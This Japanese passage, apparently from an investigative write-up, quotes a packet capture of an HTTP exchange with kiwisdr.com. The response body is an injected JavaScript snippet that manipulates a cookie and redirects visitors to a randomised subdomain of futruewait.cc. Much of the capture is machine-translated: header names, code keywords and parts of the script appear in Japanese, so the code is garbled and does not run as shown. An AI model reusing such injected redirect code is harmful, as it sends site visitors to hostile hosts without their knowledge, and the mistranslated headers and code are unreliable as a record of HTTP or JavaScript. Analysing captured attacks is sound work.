その後、私の粘り強い努力の結果、パケットキャプチャのファイルからわずかな手がかりを見つけることができました。
`GET /public/ HTTP/1.1
主催:kiwisdr.com
接続:Keep-Alive
アップグレード可能な不安全なリクエスト:1
ユーザーエージェント: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140
受け入れられる形式:text/html、application/xhtml+xml、application/xml;q=0.9、image/webp、image/apng、/;品質:0.8、MIMEタイプ:application/signed-exchange、バージョン:b3;品質:0.9
Accept-Encoding: gzip, deflate
Accept-Language: 中華語(中国)、日本語、英語
If-None-Match: 「2721824910」
If-Modified-Since: 2025年3月29日 15時29分13秒 (GMT)
HTTP/1.1 200 OK
コンテンツタイプ:text/html
キャッシュ制御:キャッシュしない
コンテンツ長:1009
接続:切断
<html><script type='text/javascript'>関数 `getCookie(n)` は、指定された名前 (n) のクッキーを取得します。`document.cookie` をセミコロンで区切って配列に変換し、その配列をループ処理します。各要素(クッキー文字列)に対して、さらにセミコロンで区切って、目的のクッキーの名前と値を取得します。<c.length; i++){ var j = c.replace(/空白+|\s+$/g, ''); if (j.indexOf(n + '=') === 0) return j.substring(n.length + 1); return null;
var k = '_d250104', v = getCookie(k)'1111111111111111111111111@24@0@1@0@+@.futruewait.cc/trunks.html?k=s4&v=1281411368',r=v.split('@'),t=parseInt(r[2]),o=parseInt(r[3]),m=parseInt(r[4]),u=r.slice(6)、i = t.length; if (++t)>=o)r[0]=r[0].slice(0,-1)+'0';r[2]=t;var y=u.split('|'); var x = r[5];変数 w は、x が '-' の場合に true を、それ以外の場合は false になります。x が '+' の場合、Math.floor(Math.random()) を実行する。y.length): x; if (x != '+') { var z = r[5].split('');=w;r[5]=z.join('');};var e=new Date(m||(Date.now()+parseInt(r[1]));3600000));r[4]=e.getTime();document.cookie=k+'='+r.join('@')+';expires='+e.toGMTString();function rd(u){var d='abcdefghijklmnopqrstuvwxyz0123456789',t='';for(var i=0;i<6;i++){var ri=Math.floor(Math.random()d.length); t += d.charAt(ri);} return u.indexOf('*') === 0 ? t + u.slice(1):u;};window.location.href='https://'+rd(y[w]);</スクリプト></html>HTTP/1.1 200 OK
アクセス制御 - 許可元:*
バリエーション:Accept-Encoding
コンテンツエンコーディング:gzip
最終更新日: 2025年4月5日 金曜日 15時34分41秒 (GMT)
ETag: 「1625282316」
コンテンツタイプ:text/html
Accept-Ranges: バイト
コンテンツ長:160571
日付: 2025年4月5日 土曜日 15時36分23秒 (GMT)
サーバー:lighttpd/1.4.35